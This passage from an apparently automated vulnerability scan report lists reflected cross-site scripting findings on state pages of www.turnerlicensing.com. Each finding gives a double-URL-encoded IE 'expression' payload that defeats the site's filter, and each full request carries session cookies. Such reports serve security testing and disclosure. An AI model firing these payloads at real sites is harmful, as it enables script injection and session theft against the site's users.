GET /teams_by_state/New-Hampshire?89c49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25274d9b5eac50e=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.109. http://www.turnerlicensing.com/teams_by_state/New-Jersey [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/New-Jersey
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3ebf4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271fb26256c52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3ebf4'style='x:expression(alert(1))'1fb26256c52 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/New-Jersey?3ebf4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271fb26256c52=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.110. http://www.turnerlicensing.com/teams_by_state/New-Mexico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/New-Mexico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bf719%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252781128e78a9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf719'style='x:expression(alert(1))'81128e78a9f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/New-Mexico?bf719%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252781128e78a9f=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.111. http://www.turnerlicensing.com/teams_by_state/New-York [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/New-York
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1fed0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252769b8cb3cf13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1fed0'style='x:expression(alert(1))'69b8cb3cf13 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/New-York?1fed0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252769b8cb3cf13=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.112. http://www.turnerlicensing.com/teams_by_state/North-Carolina [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/North-Carolina
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 650fc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271f5f4cac11d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 650fc'style='x:expression(alert(1))'1f5f4cac11d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/North-Carolina?650fc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271f5f4cac11d=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.113. http://www.turnerlicensing.com/teams_by_state/North-Dakota [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/North-Dakota
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4fdb3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6800f7fe01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4fdb3'style='x:expression(alert(1))'d6800f7fe01 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/North-Dakota?4fdb3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6800f7fe01=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.114. http://www.turnerlicensing.com/teams_by_state/Ohio [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Ohio
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6304b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d67f8a8edb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6304b'style='x:expression(alert(1))'d67f8a8edb6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Ohio?6304b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d67f8a8edb6=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.115. http://www.turnerlicensing.com/teams_by_state/Oklahoma [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Oklahoma
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f9598%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527673ea07282e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9598'style='x:expression(alert(1))'673ea07282e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Oklahoma?f9598%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527673ea07282e=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.116. http://www.turnerlicensing.com/teams_by_state/Oregon [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Oregon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3239c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270a7c4969562 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3239c'style='x:expression(alert(1))'0a7c4969562 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Oregon?3239c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270a7c4969562=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.117. http://www.turnerlicensing.com/teams_by_state/Ottawa [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Ottawa
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 885e7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527749e6052f63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 885e7'style='x:expression(alert(1))'749e6052f63 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Ottawa?885e7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527749e6052f63=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.118. http://www.turnerlicensing.com/teams_by_state/Pennsylvania [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Pennsylvania
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ffcbc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ef6395e1920 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ffcbc'style='x:expression(alert(1))'ef6395e1920 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Pennsylvania?ffcbc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ef6395e1920=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.119. http://www.turnerlicensing.com/teams_by_state/Rhode-Island [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Rhode-Island
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a84dc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252717befc6fc54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a84dc'style='x:expression(alert(1))'17befc6fc54 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Rhode-Island?a84dc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252717befc6fc54=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.120. http://www.turnerlicensing.com/teams_by_state/South-Carolina [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/South-Carolina
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 62e79%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527dc0d0d2a4ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62e79'style='x:expression(alert(1))'dc0d0d2a4ae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/South-Carolina?62e79%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527dc0d0d2a4ae=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.121. http://www.turnerlicensing.com/teams_by_state/South-Dakota [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/South-Dakota
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 29abe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527456eef5a39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29abe'style='x:expression(alert(1))'456eef5a39 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/South-Dakota?29abe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527456eef5a39=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.122. http://www.turnerlicensing.com/teams_by_state/Tennessee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Tennessee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a95b2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527349b7eab0ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a95b2'style='x:expression(alert(1))'349b7eab0ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Tennessee?a95b2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527349b7eab0ec=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.123. http://www.turnerlicensing.com/teams_by_state/Texas [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Texas
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e897%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fd511f150a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e897'style='x:expression(alert(1))'fd511f150a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
